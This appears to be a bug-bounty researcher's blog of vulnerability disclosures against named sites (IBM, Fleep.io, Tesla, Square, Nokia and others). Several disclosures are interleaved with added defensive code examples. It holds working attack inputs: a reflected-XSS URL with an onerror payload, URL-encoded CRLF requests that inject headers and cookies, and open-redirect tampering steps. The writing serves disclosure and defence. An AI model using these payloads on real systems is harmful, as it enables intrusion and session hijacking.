AWS S3 Bucket Command References

03:14 Posted by Ali Hassan Ghori

# List all buckets

aws s3 ls


# List content of a bucket

aws s3 ls s3://<bucket>


# Create a bucket

aws s3 mb s3://<bucket>


# Copy into bucket

aws s3 cp <path> s3://<bucket>


# Copy from bucket

aws s3 cp s3://<bucket>/<key> <path>


# Remove empty bucket

aws s3 rb s3://<bucket>


# Remove object from bucket

aws s3 rm s3://<bucket>/<path>


iFixit | Forgot Password Mechanism Works as a Spam Machine

19:34 Posted by Ali Hassan Ghori
1) Go to the Forgot Password page: https://www.ifixit.com/login/forgot_password
2) You will see an input text field where you can enter an e-mail address.

Now repeat the above two steps and you can keep sending e-mails to the same address again and again; all you need to do is click "Reset My Password" many times. An attacker would automate the HTTP requests and keep sending the e-mails repeatedly. This results in spamming: the attacker enters a target e-mail address, which might belong to anyone, and keeps bulk e-mails flowing to it, so the customer can only see it as spam, which is pathetic.
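The usual fix for this class of bug is to rate-limit the reset endpoint per target address and per requesting client. The limiter below is an added example, not iFixit's code; the limits and window length are assumptions chosen for illustration.

```python
import time
from collections import defaultdict, deque
from typing import Optional

# Policy values are assumptions for this example, not iFixit's real settings.
PER_ADDRESS_LIMIT = 3    # reset mails one address may receive per window
PER_CLIENT_LIMIT = 10    # reset requests one client (e.g. source IP) may make per window
WINDOW_SECONDS = 3600


class ResetRateLimiter:
    """Sliding-window limiter for a forgot-password endpoint.

    Two independent caps are enforced: per target address (so one victim
    cannot be flooded) and per requesting client (so one script cannot
    spray many addresses). State is in memory; a real deployment would back
    it with a shared store such as Redis.
    """

    def __init__(self) -> None:
        self._by_address = defaultdict(deque)
        self._by_client = defaultdict(deque)

    @staticmethod
    def _prune(events: deque, now: float) -> None:
        # Drop timestamps that have aged out of the window.
        while events and now - events[0] >= WINDOW_SECONDS:
            events.popleft()

    def allow(self, email: str, client: str, now: Optional[float] = None) -> bool:
        """Return True if a reset mail may be sent, recording the attempt."""
        now = time.time() if now is None else now
        address_events = self._by_address[email.strip().lower()]  # normalise case
        client_events = self._by_client[client]
        self._prune(address_events, now)
        self._prune(client_events, now)
        if (len(address_events) >= PER_ADDRESS_LIMIT
                or len(client_events) >= PER_CLIENT_LIMIT):
            # Denied attempts are not recorded. The HTTP handler should still
            # answer with the same neutral message either way, so the limiter
            # does not leak whether the address exists.
            return False
        address_events.append(now)
        client_events.append(now)
        return True
```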

Tracing: Trace any email to know actual sender

22:59 Posted by Ali Hassan Ghori
*** How to Trace Emails Back to their Source IP Address ***
To trace the IP address of the original email sender, head to the first Received line in the full email header, meaning the one added by the hop closest to the sender (each relay prepends its own Received line, so this is the lowest Received line in the header). Alongside that Received line is the IP address of the server that sent the email. Sometimes this also appears as X-Originating-IP or Original-IP. Find the IP address, then head to an online IP lookup service and paste the IP address to get the sender information.


@doubt2proud
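The header walk described above, as an added example that is not part of the original post: it parses a constructed header block, prefers X-Originating-IP or Original-IP when present, and otherwise takes the sending side of the earliest Received hop, skipping internal (RFC 1918, loopback, link-local) addresses that webmail and LAN hops often leave behind.

```python
import email
import re
from ipaddress import ip_address, ip_network

# Constructed sample header block (not a real message). Each relay prepends its
# own Received line, so the hop closest to the sender is the LAST Received line.
SAMPLE = """\
Received: from mx2.example.net (mx2.example.net [198.51.100.7]) by inbox.example.org with ESMTPS; Wed, 20 Jan 2016 08:49:12 +0000
Received: from mail.example.net (mail.example.net [198.51.100.5]) by mx2.example.net with ESMTP; Wed, 20 Jan 2016 08:49:10 +0000
Received: from sender-pc (unknown [203.0.113.42]) by mail.example.net with ESMTPA; Wed, 20 Jan 2016 08:49:08 +0000
X-Originating-IP: [203.0.113.42]
From: someone@example.net
To: you@example.org

body
"""

IPV4_RE = re.compile(r"(?<![\d.])((?:\d{1,3}\.){3}\d{1,3})(?![\d.])")
# Internal ranges say nothing about the origin (webmail/LAN hops), so they are skipped.
INTERNAL = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12",
            "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def routable_ips(text: str) -> list:
    """Every IPv4 address in text that is not in an internal range, in order."""
    found = []
    for match in IPV4_RE.finditer(text):
        try:
            ip = ip_address(match.group(1))
        except ValueError:          # e.g. 999.1.1.1 matched by the regex
            continue
        if not any(ip in net for net in INTERNAL):
            found.append(str(ip))
    return found


def origin_ip(raw_message: str):
    """Best-effort sender IP: X-Originating-IP/Original-IP when present,
    otherwise the sending side of the earliest Received hop."""
    msg = email.message_from_string(raw_message)
    for name in ("X-Originating-IP", "Original-IP"):
        hits = routable_ips(msg.get(name, ""))
        if hits:
            return hits[0]
    for hop in reversed(msg.get_all("Received") or []):
        from_clause = hop.split(" by ", 1)[0]   # ignore the receiving server's name/IP
        hits = routable_ips(from_clause)
        if hits:
            return hits[0]
    return None
```

Received headers can be forged by the sender, so only the hops added by servers you trust (your own MX and above) are reliable; the result is a lead for a lookup, not proof.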

Paypal | Open Url Redirection Vulnerability (paypal-biz.com)

22:57 Posted by Ali Hassan Ghori
A URL Redirection, also known as Open Redirection, occurs when a web page redirects to another web page via user-controllable input.

Paypal-biz.com was vulnerable to this issue. It was reported responsibly, and the site now accepts only URLs located on accepted domains.

@doubt2proud

ClubCollect | Url Redirection

22:46 Posted by Ali Hassan Ghori
1. Visit https://www.clubcollect.com/#home-form
2. Fill in the form by entering a name, e-mail and captcha.
3. Turn your interceptor on, click the Send button and capture the request with the interceptor.
4. Change the default 'return_to' parameter value to a domain of your choosing.

@dout2proud

Walmart | Cross Site Scripting Vulnerability

22:45 Posted by Ali Hassan Ghori
Vulnerable URL: https://homeservices.walmart.com/blog/ . It was observed that the www.homeservices.walmart.com/blog/ page was vulnerable to XSS.

 

CRLF Injection in Fleep.io

01:16 Posted by Ali Hassan Ghori
ASSALAM O ALAIKUM !

After a long time, I am writing a short disclosure of a vulnerability I recently found in Fleep.io. It has been fixed now, so I can share it.

What is CR & LF?
Carriage return (CR) comes from the days of typewriters, where it returned the carriage to the start of the line; line feed (LF) advanced the paper to the next line. Together, this sequence is referred to as CRLF.

What is CRLF Injection?
When a web application does not properly sanitize user input before using it as an HTTP header value, there is a high probability that a CRLF Injection vulnerability (also called Response Splitting or Header Injection) exists. It allows an attacker to control the remaining headers and body of the application's response, and also to create additional responses.


Proof Of Concept:

Request

https://fleep.io/v/ed1202c85b/assets/fleep/%0A%48%65%61%64%65%72%49%6E%6A%65%63%74%65%64%3A%69%6E%6A%65%63%74%65%64%5F%62%79%5F%41%6C%69%5F%48%61%73%73%61%6E%5F%47%68%6F%72%69
GET /v/ed1202c85b/assets/fleep/%0A%48%65%61%64%65%72%49%6E%6A%65%63%74%65%64%3A%69%6E%6A%65%63%74%65%64%5F%62%79%5F%41%6C%69%5F%48%61%73%73%61%6E%5F%47%68%6F%72%69 HTTP/1.1
Host: fleep.io
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive


Response

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 20 Jan 2016 08:49:12 GMT
Content-Type: text/html
Content-Length: 178
Location: https://fleep.io/v/ed1202c85b/assets/fleep/
HeaderInjected: injected_by_Ali_Hassan_Ghori/
Connection: keep-alive
Expires: Fri, 22 Jan 2016 08:49:12 GMT
Cache-Control: max-age=172800
content-security-policy: default-src 'none'
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
x-content-type-options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: deny







So, here I injected a cookie.
Request

https://fleep.io/v/ed1202c85b/assets/fleep/%0A%53%65%74%2D%43%6F%6F%6B%69%65%3A%20%69%6E%6A%65%63%74%65%64%43%6F%6F%6B%69%65%3D%73%65%63%75%72%69%74%79%77%61%6C%6C
GET /v/ed1202c85b/assets/fleep/%0A%53%65%74%2D%43%6F%6F%6B%69%65%3A%20%69%6E%6A%65%63%74%65%64%43%6F%6F%6B%69%65%3D%73%65%63%75%72%69%74%79%77%61%6C%6C HTTP/1.1
Host: fleep.io
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive


Response

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 20 Jan 2016 09:10:17 GMT
Content-Type: text/html
Content-Length: 178
Location: https://fleep.io/v/ed1202c85b/assets/fleep/
Set-Cookie: injectedCookie=securitywall/
Connection: keep-alive
Expires: Fri, 22 Jan 2016 09:10:17 GMT
Cache-Control: max-age=172800
content-security-policy: default-src 'none'
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
x-content-type-options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: deny
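To show why the decoded %0A ended up as a second header, here is an added example (toy code, not Fleep's nginx configuration): a redirect builder that concatenates the decoded path into Location, the same builder with the path re-encoded and control characters rejected, and a lenient header parser that, like browsers, accepts a bare LF as a line break.

```python
from urllib.parse import quote, unquote

BASE_URL = "https://fleep.io"
# Decoded form of the second request's path above (the %0A becomes a bare LF).
INJECTED_PATH = "/v/ed1202c85b/assets/fleep/%0ASet-Cookie:%20injectedCookie=securitywall"


def build_redirect_vulnerable(raw_path: str) -> bytes:
    """Toy 301 builder that decodes the path, appends the trailing slash and
    drops the result into Location without looking for CR/LF. This mirrors
    what the Fleep.io response shows: the LF splits Location into two headers."""
    target = BASE_URL + unquote(raw_path) + "/"
    return f"HTTP/1.1 301 Moved Permanently\r\nLocation: {target}\r\n\r\n".encode()


def reject_control_chars(value: str) -> str:
    """Refuse any header value containing CR, LF or another control byte."""
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in value):
        raise ValueError("control character in header value")
    return value


def build_redirect_safe(raw_path: str) -> bytes:
    """Hardened builder: re-encodes the decoded path so %0A/%0D stay encoded,
    then runs the final value through reject_control_chars as a last line of defence."""
    path = quote(unquote(raw_path), safe="/:@!$&'()*+,;=-._~")
    target = reject_control_chars(BASE_URL + path + "/")
    return f"HTTP/1.1 301 Moved Permanently\r\nLocation: {target}\r\n\r\n".encode()


def parse_headers(response: bytes) -> dict:
    """Lenient header parser that, like browsers, accepts a bare LF as a line
    terminator, which is why a single %0A was enough in the PoC above."""
    head = response.decode("latin-1").split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.splitlines()[1:]:          # skip the status line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip()] = value.strip()
    return headers
```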









TeslaMotor Cross Site Scripting Vulnerability

13:17 Posted by Ali Hassan Ghori
I found an XSS issue in the suppliers.teslamotors.com domain.


Steps To Reproduce:
Note: for intercepting the request I used the Firefox add-on Tamper Data.

1- Visit: https://suppliers.teslamotors.com/supplier/

2- Type a username and password in the given fields.

3- Before clicking the Login button, run Tamper Data and start tampering.

4- Back on the page, click the "Remember me" check box.

5- Click the Login button. Your request is now caught by Tamper Data; replace the 'remember-me' parameter value "1" with your {XSS payload}.

6- Click the "OK" button.

7- XSS pop up !!!


Snap Shot:

TeslaMotor Cross Site Scripting Vulnerability


Video PoC:




SquareUp Open Redirection

07:38 Posted by Ali Hassan Ghori
During password resetting I observed that the password token link is first redirected through a subscriptions link, where 'r' is the parameter and its value can be any website.
Steps To Reproduce:
1- After receiving the password reset email, copy the link address.


2- The address URI looks like this:
https://squareup.com/subscriptions/r?d=VHZ0CwTM5CMAwfX4&e=/html/body/table/tr/td/table[1]/tr[2]/td/table/tr[2]/td/table/tr[2]/td[2]/table/tr[5]/td/div/a&n=emailClick&r=https://squareup.com/password/reset/Token

Video PoC: 
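The three redirect findings above (Paypal-biz.com, ClubCollect's 'return_to' and Square's 'r') share one fix: validate the target against an exact host allow-list before redirecting. This is an added example, not any of those sites' code; the allowed hosts and the trimmed Square URL are constructed for illustration.

```python
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed from the Square reset link quoted above (the XPath 'e' parameter is dropped).
SQUARE_RESET_URL = ("https://squareup.com/subscriptions/r?d=VHZ0CwTM5CMAwfX4&n=emailClick"
                    "&r=https://squareup.com/password/reset/Token")


def is_safe_redirect(target: str, allowed_hosts) -> bool:
    """Accept only absolute https URLs whose host is exactly on the allow-list.

    The checks are ordered to defeat the usual validator bypasses: raw control
    characters and backslashes (which browsers turn into slashes), scheme-relative
    //host targets, non-http schemes such as javascript:, and userinfo tricks of
    the form https://allowed.example@evil.example/.
    """
    target = unquote(target).strip()
    if not target or any(c in target for c in "\\\r\n\t\0"):
        return False
    parts = urlsplit(target)
    if parts.scheme.lower() != "https":
        return False          # also rejects "//evil.example" (empty scheme)
    if parts.username is not None or parts.password is not None:
        return False
    return (parts.hostname or "").lower() in allowed_hosts


def redirect_target(url: str, param: str, allowed_hosts) -> Optional[str]:
    """Read the redirect parameter (Square's 'r', ClubCollect's 'return_to') from
    url and return it only if it validates; None means fall back to a fixed page."""
    values = parse_qs(urlsplit(url).query).get(param, [])
    if len(values) != 1 or not is_safe_redirect(values[0], allowed_hosts):
        return None
    return values[0]
```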



Remote Presentation Auth_key Issue In Prezi

01:46 Posted by Ali Hassan Ghori
Remote Presentation Auth_key Problem


Let me explain this issue with the following example.

Suppose:

abc is the first presentation _ (1)
123 is the second presentation _ (2)

I start a remote presentation of abc with the constant parameter of all presentations, ?follow=r_rk7caxdncs, and the Auth_key ngwd219. Now, if I find someone's Auth_key, every active Auth_key can start a remote presentation of every work.
The impact is clear from the example: I can use the Auth_key of abc with the 123 presentation or vice versa, or any active Auth_key can start the presentation.


One more issue is the constant follow parameter in every post.

Gist: https://gist.github.com/zsellera/4fe26ee7c546a4d136f4




October is National Cyber Security Awareness Month (NCSAM)

01:27 Posted by Ali Hassan Ghori
Hi Everybody,

As you all know, October is National Cyber Security Awareness Month, and SingleHop has dedicated this one to helping spread the word about how people can protect themselves from different attacks.

First of all, a password is the most important thing you have to protect your data, your information and yourself. It is said that

"Don't make a password that contains your secret; make a unique and strong password and keep all your secrets safe behind it."

If you have a strong and unique password, you should now take care of the following things:
  • Don't share your password with anyone.
  • Don't enter your password on an untrusted computer.
  • Don't use the same password on every application.
  • Change your password occasionally.

In 2014, nearly 5 million Gmail accounts and passwords were leaked by a Russian hacker. The hacker claimed that around 60% of the passwords were still valid, although some users had changed their password.
According to researchers, this is nothing but a rumor: the hacked accounts were compiled from different sources such as vulnerable applications, phishing attacks, etc.

What is a Phishing Attack?
Phishing is a fraud method in which the attacker builds a look-alike copy of a well-known site and codes a payload on the backend. When users enter their information on it, it is sent to the attacker and the victim is redirected to the original site.

One more important feature has already been introduced: the two-factor verification process. It was first introduced by Google.

What is the Two-Factor Verification Process?

Two-factor verification is a process that strengthens authentication by requiring a second factor after the username/password stage.


How Does the Two-Factor Authentication Method Work?

The first step is to log in with your username/email and password.
With two-factor authentication enabled, a mobile phone is required: every login attempt requires a unique code that is sent via SMS to the given number.

SingleHop also uses this feature to keep user data safe; they take care of it very seriously.

In 2012, three GoDaddy servers failed to resolve as a result of a hack. Millions of GoDaddy-hosted websites went down for more than 5 hours. So, using a secure, reliable and branded server is also important for a safe internet.

Mostly, servers get hacked due to old infrastructure, missing updates, vulnerable code, misconfigurations, poor scripting and vulnerable third-party applications, and it is a developer's right to demand that a hosting company like SingleHop take more responsibility for securing their data. SingleHop took steps against these hacks, embedded security features and built secure dedicated servers for developers. SingleHop added the server's own application, different account levels, a monitoring system, antivirus protection, application patching and firewalls to ensure that the company's data is always safe and protected.

X-Scanner By The WMA team

X-Scanner is a point'n'shoot web scanner used for fast preliminary tests prior to serious penetration testing.
This tool works on the Windows/.NET platform and on Linux/Mono.

Key Features:
[+] 1. Get Server Info
[+] 2. Check For HttpOnly Flag
[+] 3. Check For XFrame-Options
[+] 4. Check For X-XSS-Protection
[+] 5. Check For X-Content-Type options
[+] 6. Check For SSL/TLS Security
[+] 7. Check For Content Security Policy
[+] 8. Check For Access Control flaws
[+] 9. Check For X-Download Options
[+] 10. Check For Cache Control Options
[+] 11. Blazing fast TCP Port Scanner and OS Fingerprinting.
[+] 12. One of the fastest WhoIs queries in the market.
Provided here is an example report of the tool.
http://pastebin.com/uu1GcLai
As you *might* have seen, the scan finished in just 10s.
Price: $50
Contact alihasanghauri5@gmail.com for details and to get a copy.

FB: https://www.facebook.com/alihassanghori5

Thanks.
The WMA team.



Facebook Mark Zuckerberg Password Reset Bug - Not exploitable

12:23 Posted by Ali Hassan Ghori
I was looking for a bug in Facebook's forgot password feature.

I sent a reset password link to my email account through Facebook, opened the link and changed my id to Mark Zuckerberg's id, 4.





Mark Zukerberg's Id
http://graph.facebook.com/4



I thought that I had found something, but it's not so: I tried this bug using my own accounts (not Mark Zuckerberg's :) and it doesn't allow me to set a new password. The "n" parameter is tied to the "u" parameter. Instead of using Mark Zuckerberg's account



Video POC:
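The Prezi issue above (any active Auth_key opens any presentation) and the Facebook result (the reset token "n" is tied to the user "u", so swapping the id fails) are two sides of the same design point: a capability token must be bound to the resource and the principal it was issued for. The following is an added example of such binding with an HMAC, not Prezi's or Facebook's actual implementation; the secret, separator and TTL are assumptions.

```python
import hashlib
import hmac
import secrets
import time
from typing import Optional

# Server-side secret; generated here for the example, normally loaded from a KMS/env.
SERVER_SECRET = secrets.token_bytes(32)
SEP = "|"


def issue_token(resource_id: str, user_id: str, ttl_seconds: int = 900,
                now: Optional[int] = None) -> str:
    """Mint a token that is valid only for this (resource, user) pair and only
    until expiry. Layout: resource|user|expiry|hmac-sha256."""
    if SEP in resource_id or SEP in user_id:
        raise ValueError("identifier contains separator")
    expiry = (int(time.time()) if now is None else now) + ttl_seconds
    body = SEP.join((resource_id, user_id, str(expiry)))
    mac = hmac.new(SERVER_SECRET, body.encode(), hashlib.sha256).hexdigest()
    return body + SEP + mac


def verify_token(token: str, resource_id: str, user_id: str,
                 now: Optional[int] = None) -> bool:
    """Return True only if the token was minted for exactly this resource and
    user, is unexpired, and carries a valid MAC. Checking the binding is the
    step whose absence let one Auth_key open any presentation; a reset flow
    whose 'n' is tied to 'u' is doing the equivalent check."""
    try:
        res, user, exp_str, mac = token.split(SEP)
        expiry = int(exp_str)
    except ValueError:
        return False
    body = SEP.join((res, user, exp_str))
    expected = hmac.new(SERVER_SECRET, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, mac):
        return False                       # forged or tampered
    if res != resource_id or user != user_id:
        return False                       # valid token, wrong presentation/user
    current = int(time.time()) if now is None else now
    return current < expiry
```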


Symphony Fatal Database Error Disclosure - NOKIA

09:18 Posted by Ali Hassan Ghori

Here is Ali Hassan Ghori, back after a long time.

As I am back in my field, let me share one of my Nokia findings. While I was looking for a bug in Nokia, I discovered something critical: a Symphony fatal database error disclosure in nokiaconnection.co.uk.

Steps To Reproduce:
1- Visit https://nokiaconnection.co.uk/sign-in/resend-password/ (To reproduce in Mozilla Firefox, install the Tamper Data plugin, or use Burp Suite.)

2- Type a single quote (') in the email field; it shows an error, right? (Something like 'Please enter a valid email address'.)

3- Launch Tamper Data, tamper the given page and change the email parameter value to a single quote (').

4- Exploited !!!!
 
Symphony Fatal Database Error Disclosure - NOKIA


Video POC:

IBM Xssed

08:49 Posted by Ali Hassan Ghori
I felt happy when I found a Cross Site Scripting vulnerability in the site of one of the biggest companies, IBM. It is my pleasure that I helped them as a white-hat web application security researcher.

About IBM
Inventions:
Computing Scale: Used to weigh and price things, usable by any vendor. This invention saved retailers a lot of money.
Universal Product Code: Even though barcodes were dreamed up and patented in the late 1940s and early 1950s, they weren't in use until lasers emerged years later so that they could be read digitally. This technology sped up checkouts and improved inventory-keeping.
Their inventions have helped ease the daily life of many people, such as managers, teachers, students, store owners, and many employees. IBM has many other inventions that have made our lives easier and should be greatly appreciated.

It is my honor that I helped IBM.

By the way, here is a Proof of Concept of the Cross Site Scripting vulnerability in IBM:


Host:  https://www.research.ibm.com
PoC: https://www.research.ibm.com/cgi-bin/haifa/svt/public.pl?group=%22%3E%3Cimg%20src=x%20onerror=prompt%28document.domain%29%3E
Status: Fixed
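The IBM PoC reflects the group parameter into the page unencoded; the Walmart and Tesla posts above describe the same class of bug. As an added example (not IBM's code, and the input markup is an assumption about the sink), here is the unencoded reflection next to its attribute-context-encoded form, plus the cheap triage check of whether a probe string comes back verbatim.

```python
import html
from urllib.parse import parse_qs, urlsplit

# The IBM PoC URL quoted above; the 'group' value decodes to the payload.
IBM_POC_URL = ("https://www.research.ibm.com/cgi-bin/haifa/svt/public.pl"
               "?group=%22%3E%3Cimg%20src=x%20onerror=prompt%28document.domain%29%3E")


def query_param(url: str, name: str) -> str:
    """Decoded value of one query parameter (empty string if absent)."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_vulnerable(value: str) -> str:
    """Reflects the parameter into an attribute value unencoded. The leading
    quote in the payload closes the attribute and the rest opens a new tag."""
    return f'<input type="text" name="group" value="{value}">'


def render_safe(value: str) -> str:
    """Attribute-context output encoding: quotes and angle brackets become
    entities, so the value can never close the attribute or open a tag."""
    return f'<input type="text" name="group" value="{html.escape(value, quote=True)}">'


def reflects_unencoded(body: str, probe: str) -> bool:
    """Triage helper: True if the probe string reappears verbatim in the
    response body, the first sign of a reflected XSS sink."""
    return probe in body
```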





 

Netflix - Finding Bug

08:01 Posted by Ali Hassan Ghori
Netflix has a Responsible Disclosure Policy and a Hall of Fame page for those who report a valid bug to them.

For this I was searching for a bug that is valid and not a duplicate issue. ALHAMDULILLAH!, it is my luck that the reported issue was accepted as valid and had not been reported previously by another researcher.

Here are the details:

During reconnaissance I found a domain (netflixprize.com) and started searching for a bug in it. I noticed that password data was transmitted over HTTP. I reported this issue to Netflix. They accepted it and removed the login page, because there was no more need for a login page on that domain.

Reporting Date: Jan/02/2014
Acknowledgement Date: Jan/02/2014
Issue fixed: Jan/03/2014
Listed Inside Netflix: Jan/04/2014